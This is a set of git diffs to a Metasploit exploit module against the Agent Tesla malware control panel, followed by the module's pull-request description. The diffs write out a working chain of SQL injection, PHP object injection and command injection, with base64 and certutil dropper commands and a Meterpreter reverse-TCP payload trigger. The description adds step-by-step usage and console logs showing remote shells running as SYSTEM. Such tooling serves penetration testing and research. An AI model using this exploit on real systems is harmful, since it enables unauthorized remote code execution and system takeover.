+              'Platform' => 'windows',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/generic',
+                'DisablePayloadHandler' => 'true'
+              }
             }
-          }],
+          ],
         ],
         'DefaultTarget' => 0,
         'Notes' => {
@@ -85,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
 
     register_advanced_options([
-      OptBool.new('ForceExploit', [false, "Exploit the target without checking if it is vulnerable", false])
+      OptBool.new('ForceExploit', [false, 'Exploit the target without checking if it is vulnerable', false])
     ])
   end
 
@@ -243,7 +249,7 @@ class MetasploitModule < Msf::Exploit::Remote
         return Msf::Exploit::Failed
       end
       if os == 'windows'
-        panel_uri = datastore['TARGETURI'].gsub("/", "\\")
+        panel_uri = datastore['TARGETURI'].gsub('/', '\\')
         print_status("Payload uploaded as: #{file_name} to C:\\wamp64\\www\\#{panel_uri}\\server_side\\scripts\\#{file_name}")
         register_file_for_cleanup("C:\\wamp64\\www\\#{panel_uri}\\server_side\\scripts\\#{file_name}")
       else

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -190,7 +190,6 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_good('The target appears to be vulnerable.')
     end
 
-
     os = os_get_name
     unless os
       print_bad('Could not determine the targeted operating system.')
@@ -227,5 +226,4 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', file_name)
     }, 2.5)
   end
-
 end

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -236,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
       file_name = '.' + Rex::Text.rand_text_alpha(4) + '.php'
       case os
       when /linux/
-        cmd = "echo '#{Rex::Text.encode_base64(payload.encoded)}' | base64 -d > #{file_name} && echo 'DONE'"
+        cmd = "echo '#{Rex::Text.encode_base64(payload.encoded)}' | base64 -d > /tmp/#{file_name} && php /tmp/#{file_name}'"
       when /windows/
         cmd = "echo #{Rex::Text.encode_base64(payload.encoded)} > #{file_name}.b64 & certutil -decode #{file_name}.b64 #{file_name} & del #{file_name}.b64"
       end

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -183,12 +184,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless datastore['ForceExploit']
-      if check != Exploit::CheckCode::Vulnerable
-        fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
-      end
-      vprint_good('The target appears to be vulnerable.')
-    end
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
 
     os = os_get_name
     unless os
@@ -209,8 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     response = execute_command(cmd)
     unless response && response.code == 200 && response.body.include?('command completed successfully')
-      print_error('Payload upload failed :(')
-      return Msf::Exploit::Failed
+      fail_with(Failure::UnexpectedReply, 'Payload upload failed :(')
     end
     if os == 'windows'
       panel_uri = datastore['TARGETURI'].gsub('/', '\\')

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -15,10 +15,10 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Agent Tesla Panel Remote Code Execution',
         'Description' => %q{
-          This module exploits a command injection vulnerability within the Agent Tesla control panel, 
-          in combination with an SQL injection vulnerability and a PHP object injection vulnerabilty, to gain 
-          remote code execution on affected hosts. 
-          
+          This module exploits a command injection vulnerability within the Agent Tesla control panel,
+          in combination with an SQL injection vulnerability and a PHP object injection vulnerabilty, to gain
+          remote code execution on affected hosts.
+
           Panel versions released prior to Sepetember 12, 2018 can be exploited by unauthenticated attackers to
           gain remote code execution as user running the web server. Agent Tesla panels released on or after
           this date can still be exploited however, provided that attackers have valid credentials for the
@@ -230,7 +230,7 @@ class MetasploitModule < Msf::Exploit::Remote
       file_name = '.' + Rex::Text.rand_text_alpha(4) + '.php'
       case os
       when /linux/
-        cmd = "echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{file_name}"
+        cmd = "echo '#{Rex::Text.encode_base64(payload.encoded)}' | base64 -d > #{file_name} && echo 'DONE'"
       when /windows/
         cmd = "echo #{Rex::Text.encode_base64(payload.encoded)} > #{file_name}.b64 & certutil -decode #{file_name}.b64 #{file_name} & del #{file_name}.b64"
       end
@@ -238,7 +238,7 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_status("Generated command payload: #{cmd}")
 
       response = execute_command(cmd)
-      unless response && response.code == 200 && response.body.include?('recordsTotal')
+      unless response && response.code == 200 && (response.body.include?('Done') || response.body.include?('command completed successfully'))
         print_error('Payload upload failed :(')
         return Msf::Exploit::Failed
       end

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -28,12 +28,12 @@ class MetasploitModule < Msf::Exploit::Remote
           'mekhalleh (RAMELLA Sébastien)' #  added windows targeting and authenticated RCE
         ],
         'References' => [
-          ['EDB', '47256'], # original module published.
+          ['EDB', '47256'], # Original PoC and Metasploit module
           ['URL', 'https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources'], # Agent-Tesla WebPanel's available for download
-          ['URL', 'https://www.pirates.re/agent-tesla-remote-command-execution-(fighting-the-webpanel)'], # fr
-          ['URL', 'https://krebsonsecurity.com/2018/10/who-is-agent-tesla/']
+          ['URL', 'https://www.pirates.re/agent-tesla-remote-command-execution-(fighting-the-webpanel)'], # Writeup in French on this module and its surrounding research.
+          ['URL', 'https://krebsonsecurity.com/2018/10/who-is-agent-tesla/'] # Background info on Agent Tesla
         ],
-        'DisclosureDate' => '2018-07-10',
+        'DisclosureDate' => '2019-08-14', # Date of first PoC for this module, not aware of anything prior to this.
         'License' => MSF_LICENSE,
         'Platform' => ['php', 'unix', 'windows'],
         'Arch' => [ARCH_CMD, ARCH_PHP],

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -63,8 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ))
 
     register_options([
-      Opt::RPORT(80),
-      OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
+      OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/'])
     ])
   end
 
@@ -86,15 +85,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def parse_response(js)
-    if js
-      json = {}
-      begin
-        json = JSON.parse(sanitize_json(js.body))
-        return "#{json['data'][0]['username']}"
-      rescue JSON::ParserError
-      end
-    end
-
+    return false unless js
+    json = JSON.parse(sanitize_json(js.body))
+    return "#{json['data'][0]['username']}"
+  rescue
     return false
   end
 
@@ -105,15 +99,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(command)
+    junk = rand(1_000)
     response = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
+      'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', 'server_processing.php'),
       'encode_params' => true,
       'vars_get' => {
         'table' => 'passwords',
         'primary' => 'password_id',
         'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
-        'where' => Rex::Text.encode_base64("1=1 UNION SELECT \"#{command}\"")
+        'where' => Rex::Text.encode_base64("#{junk}=#{junk} UNION SELECT \"#{command}\"")
       }
     )
     if (response) && (response.body)
@@ -181,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ## Triggering.
       send_request_cgi({
         'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, '/server_side/scripts/', file_name)
+        'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', file_name)
       }, 2.5)
     end
   end

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -23,6 +23,9 @@ class MetasploitModule < Msf::Exploit::Remote
           gain remote code execution as user running the web server. Agent Tesla panels released on or after
           this date can still be exploited however, provided that attackers have valid credentials for the
           Agent Tesla control panel.
+
+          Note that this module presently only fully supports Windows hosts running Agent Tesla on the WAMP stack.
+          Support for Linux may be added in a future update, but could not be confirmed during testing.
         },
         'Author' => [
           'Ege Balcı <ege.balci@invictuseurope.com>', # discovery and independent module
@@ -37,8 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2019-08-14', # Date of first PoC for this module, not aware of anything prior to this.
         'License' => MSF_LICENSE,
-        'Platform' => ['php', 'unix', 'windows'],
-        'Arch' => [ARCH_CMD, ARCH_PHP],
+        'Platform' => ['php'],
+        'Arch' => [ARCH_PHP],
         'Privileged' => false,
         'Targets' => [
           [
@@ -49,28 +52,6 @@ class MetasploitModule < Msf::Exploit::Remote
               'DefaultOptions' => {
                 'PAYLOAD' => 'php/meterpreter/reverse_tcp',
                 'DisablePayloadHandler' => 'false'
-              }
-            }
-          ],
-          [
-            'Unix (In-Memory)', {
-              'Platform' => 'unix',
-              'Arch' => ARCH_CMD,
-              'Type' => :unix_memory,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/generic',
-                'DisablePayloadHandler' => 'true'
-              }
-            }
-          ],
-          [
-            'Windows (In-Memory)', {
-              'Platform' => 'windows',
-              'Arch' => ARCH_CMD,
-              'Type' => :windows_memory,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/generic',
-                'DisablePayloadHandler' => 'true'
               }
             }
           ],
@@ -209,59 +190,42 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_good('The target appears to be vulnerable.')
     end
 
-    case target['Type']
-    when :unix_memory, :windows_memory
-      print_status("Sending #{datastore['PAYLOAD']} command payload")
-      vprint_status("Generated command payload: #{payload.encoded}")
 
-      cmd_output = execute_command(payload.encoded)
-      if cmd_output && datastore['PAYLOAD'] == "cmd/#{target['Platform']}/generic"
-        print_warning('Dumping command output in parsed json response (can be incomplete).')
-        cmd_output = parse_response(cmd_output)
-        if cmd_output.empty?
-          print_error('Empty response, no command output')
-          return
-        end
-        print_line(cmd_output.to_s)
-      end
-
-    when :php_dropper
-      os = os_get_name
-      unless os
-        print_bad('Could not determine the targeted operating system.')
-        return Msf::Exploit::Failed
-      end
-      print_status("Targeted operating system is: #{os}")
-
-      file_name = '.' + Rex::Text.rand_text_alpha(4) + '.php'
-      case os
-      when /linux/
-        cmd = "echo '#{Rex::Text.encode_base64(payload.encoded)}' | base64 -d > /tmp/#{file_name} && php /tmp/#{file_name}'"
-      when /windows/
-        cmd = "echo #{Rex::Text.encode_base64(payload.encoded)} > #{file_name}.b64 & certutil -decode #{file_name}.b64 #{file_name} & del #{file_name}.b64"
-      end
-      print_status("Sending #{datastore['PAYLOAD']} command payload")
-      vprint_status("Generated command payload: #{cmd}")
-
-      response = execute_command(cmd)
-      unless response && response.code == 200 && (response.body.include?('Done') || response.body.include?('command completed successfully'))
-        print_error('Payload upload failed :(')
-        return Msf::Exploit::Failed
-      end
-      if os == 'windows'
-        panel_uri = datastore['TARGETURI'].gsub('/', '\\')
-        print_status("Payload uploaded as: #{file_name} to C:\\wamp64\\www\\#{panel_uri}\\server_side\\scripts\\#{file_name}")
-        register_file_for_cleanup("C:\\wamp64\\www\\#{panel_uri}\\server_side\\scripts\\#{file_name}")
-      else
-        print_status("Payload uploaded as: #{file_name}")
-      end
-
-      # Triggering payload.
-      send_request_cgi({
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', file_name)
-      }, 2.5)
+    os = os_get_name
+    unless os
+      print_bad('Could not determine the targeted operating system.')
+      return Msf::Exploit::Failed
     end
+    print_status("Targeted operating system is: #{os}")
+
+    file_name = '.' + Rex::Text.rand_text_alpha(10) + '.php'
+    case os
+    when /linux/
+      fail_with(Failure::NoTarget, "This module currently doesn't support exploiting Linux targets!")
+    when /windows/
+      cmd = "echo #{Rex::Text.encode_base64(payload.encoded)} > #{file_name}.b64 & certutil -decode #{file_name}.b64 #{file_name} & del #{file_name}.b64"
+    end
+    print_status("Sending #{datastore['PAYLOAD']} command payload")
+    vprint_status("Generated command payload: #{cmd}")
+
+    response = execute_command(cmd)
+    unless response && response.code == 200 && response.body.include?('command completed successfully')
+      print_error('Payload upload failed :(')
+      return Msf::Exploit::Failed
+    end
+    if os == 'windows'
+      panel_uri = datastore['TARGETURI'].gsub('/', '\\')
+      print_status("Payload uploaded as: #{file_name} to C:\\wamp64\\www\\#{panel_uri}\\server_side\\scripts\\#{file_name}")
+      register_file_for_cleanup("C:\\wamp64\\www\\#{panel_uri}\\server_side\\scripts\\#{file_name}")
+    else
+      fail_with(Failure::NoTarget, "This module currently doesn't support exploiting Linux targets! This error should never be hit!")
+    end
+
+    # Triggering payload.
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', file_name)
+    }, 2.5)
   end
 
 end


### PR DESCRIPTION
## Introduction

This module exploit the command injection vulnerability in control center of the agent Tesla.

## Setup

Resources for testing are available here:
<https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources>

### Windows

I used WAMP server 3.1.9 x64 configured with PHP version 5.6.40 (for ioncube compatibility).

### Linux

I used a Debian 9 on which I installed PHP version 5.6.40 (for ioncube compatibility).

## Verification Steps

1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/multi/http/agent_tesla_panel_rce`
4. Do: `set RHOSTS 192.168.0.15`
5. Do: `run`

## Targets

```
   Id  Name
   --  ----
   0   Automatic (Dropper)
   1   Unix (In-Memory)
   2   Windows (In-Memory)
```

## Options

**Proxies**

A proxy chain of format type:host:port[,type:host:port][...]. It's optional.

**RHOSTS**

The target IP adress on which the control center responds.

**RPORT**

The target TCP port on which the control center responds. Default: 80

**SSL**

Negotiate SSL/TLS for outgoing connections. Default: false

**TARGETURI**

The base URI path of control center. Default: '/WebPanel

**VHOST**

The target HTTP server virtual host.

## Usage

### Targeting Windows

```
msf5 exploit(multi/http/agent_tesla_panel_rce) > set rhosts 192.168.1.21
rhosts => 192.168.1.21
msf5 exploit(multi/http/agent_tesla_panel_rce) > set lhost 192.168.1.13
lhost => 192.168.1.13
msf5 exploit(multi/http/agent_tesla_panel_rce) > run

[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Targeted operating system is: windows
[*] Sending php/meterpreter/reverse_tcp command payload
[*] Payload uploaded as: .AUKU.php
[*] Sending stage (38247 bytes) to 192.168.1.21
[*] Meterpreter session 1 opened (192.168.1.13:4444 -> 192.168.1.21:1036) at 2019-09-04 01:24:12 +0400

meterpreter >
```

--or--

```
msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 2
target => 2
msf5 exploit(multi/http/agent_tesla_panel_rce) > run

[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Sending cmd/windows/reverse_powershell command payload
[*] Command shell session 2 opened (192.168.1.13:4444 -> 192.168.1.21:1040) at 2019-09-04 01:28:55 +0400

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp64\www\WebPanel\server_side\scripts>whoami
nt authority\system

C:\wamp64\www\WebPanel\server_side\scripts>
```

--or--

```
msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 2
target => 2
msf5 exploit(multi/http/agent_tesla_panel_rce) > set payload cmd/windows/generic
payload => cmd/windows/generic
msf5 exploit(multi/http/agent_tesla_panel_rce) > set cmd whoami
cmd => whoami
msf5 exploit(multi/http/agent_tesla_panel_rce) > set verbose true
verbose => true
msf5 exploit(multi/http/agent_tesla_panel_rce) > run

[+] The target appears to be vulnerable.
[*] Sending cmd/windows/generic command payload
[*] Generated command payload: whoami
[!] Dumping command output in parsed json response
nt authority\system
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/agent_tesla_panel_rce) >
```

### Targeting Linux

```
msf5 exploit(multi/http/agent_tesla_panel_rce) > run

[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Targeted operating system is: linux
[*] Sending php/meterpreter/reverse_tcp command payload
[*] Payload uploaded as: .WxWf.php
[*] Sending stage (38247 bytes) to 192.168.1.25
[*] Meterpreter session 2 opened (192.168.1.13:4444 -> 192.168.1.25:43260) at 2019-09-04 14:44:07 +0400

meterpreter >
```

--or--

```
msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 1
target => 1
msf5 exploit(multi/http/agent_tesla_panel_rce) > set cmd whoami
cmd => whoami
msf5 exploit(multi/http/agent_tesla_panel_rce) > run

[*] Sending cmd/unix/generic command payload
[!] Dumping command output in parsed json response
www-data
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/agent_tesla_panel_rce) >
```

## References

  1. <https://www.cyber.nj.gov/threat-profiles/trojan-variants/agent-tesla>
  2. <https://krebsonsecurity.com/2018/10/who-is-agent-tesla/>
  3. <https://github.com/mekhalleh/agent_tesla_panel_rce/resources/>
  4. <https://www.exploit-db.com/exploits/47256>
